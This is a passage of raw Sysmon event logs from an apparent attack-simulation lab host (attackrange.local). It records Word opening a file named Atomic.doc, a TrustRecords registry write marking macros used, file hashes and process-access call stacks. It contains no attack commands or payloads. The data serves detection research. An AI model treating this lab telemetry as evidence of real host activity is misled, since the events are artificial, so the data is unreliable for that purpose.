Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.storage.dll+3c9e7e|C:\Windows\System32\windows.storage.dll+3c5b4f|C:\Windows\System32\windows.storage.dll+3c6c90|C:\Windows\System32\windows.storage.dll+3c8d0e|C:\Windows\System32\windows.storage.dll+13c3e3|C:\Windows\System32\windows.storage.dll+13bdd9|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292831Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.954{BEA10069-02A1-6088-112A-00000000BB01}6568WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\Atomic.LNKMD5=ADDDDB97DACBA44EEA26FE2B49F76C8C,SHA256=551BE041902D0BBFD24EDFAB4427AF6B6217DCED229683B2730DCB54A200887C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292830Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.954{BEA10069-02A1-6088-112A-00000000BB01}65684200C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+3c73e8|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\windows.storage.dll+3cbf38|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175294|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175179|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292829Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.954{BEA10069-02A1-6088-112A-00000000BB01}65684200C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c73cc|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\windows.storage.dll+3cbf38|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175294|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175179|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292828Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.954{BEA10069-02A1-6088-112A-00000000BB01}65684200C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c73cc|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\windows.storage.dll+3cbf38|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175294|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175179|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000292827Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.localDownloads2021-04-27 12:25:06.801{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\Downloads\~$Atomic.doc2021-04-27 12:25:06.801 13241300x8000000000000000292826Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.localContext,ProtectedModeExitOrMacrosUsedSetValue2021-04-27 12:25:06.801{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-856508502-2684788124-1264803439-500\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Documents\TrustRecords\%USERPROFILE%/Downloads/Atomic.docBinary Data 23542300x8000000000000000292825Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.785{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=BF1752165EA14E0BD9E28CDD7C19A296,SHA256=682E2289C4B710D86F47BCCE78B6945F622596B9F22B5E0BD89A864C5A0CE391,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292824Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.769{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=A6AD4A5DE231D92AA1532A66FBBFE959,SHA256=6827B051C5AA65E35D5D9138D83B3BCBAF48A59B67BFB6EABEFADCD73E6CE0EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292823Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.769{BEA10069-D0C1-6086-0A00-00000000BB01}6244628C:\Windows\system32\services.exe{BEA10069-02A2-6088-122A-00000000BB01}6212C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292822Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.769{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-02A2-6088-122A-00000000BB01}6212C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292821Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.720{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292820Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.710{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-02A2-6088-122A-00000000BB01}6212C:\Windows\system32\sppsvc.exe0x103800C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292819Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.710{BEA10069-D0C1-6086-0A00-00000000BB01}6246440C:\Windows\system32\services.exe{BEA10069-02A2-6088-122A-00000000BB01}6212C:\Windows\system32\sppsvc.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292818Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.691{BEA10069-D0C2-6086-1400-00000000BB01}3681636C:\Windows\system32\svchost.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292817Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.690{BEA10069-D0C2-6086-1400-00000000BB01}3681636C:\Windows\system32\svchost.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292816Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.689{BEA10069-D0C2-6086-1400-00000000BB01}3681636C:\Windows\system32\svchost.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292815Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.674{BEA10069-D4AE-6086-5101-00000000BB01}28123888C:\Windows\system32\taskhostw.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292814Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.674{BEA10069-D4AE-6086-5101-00000000BB01}28123888C:\Windows\system32\taskhostw.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292813Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.666{BEA10069-028A-6088-082A-00000000BB01}5840NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\wbem\wmiprvse.exeC:\Windows\INF\disk.PNFMD5=65C4A02BF99DBB35D7EBA8ECB8BBFEE6,SHA256=D5B3B960D93649666A91873DB900608B32CEB642CAA7A4AFFC02829CFFF83397,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292812Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.658{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292811Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.658{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292810Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.658{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-D0C1-6086-0A00-00000000BB01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292809Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.508{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292808Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.491{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292807Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.491{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292806Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.468{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292805Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.468{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292804Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.468{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292803Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.467{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292802Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.438{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292801Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.438{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft 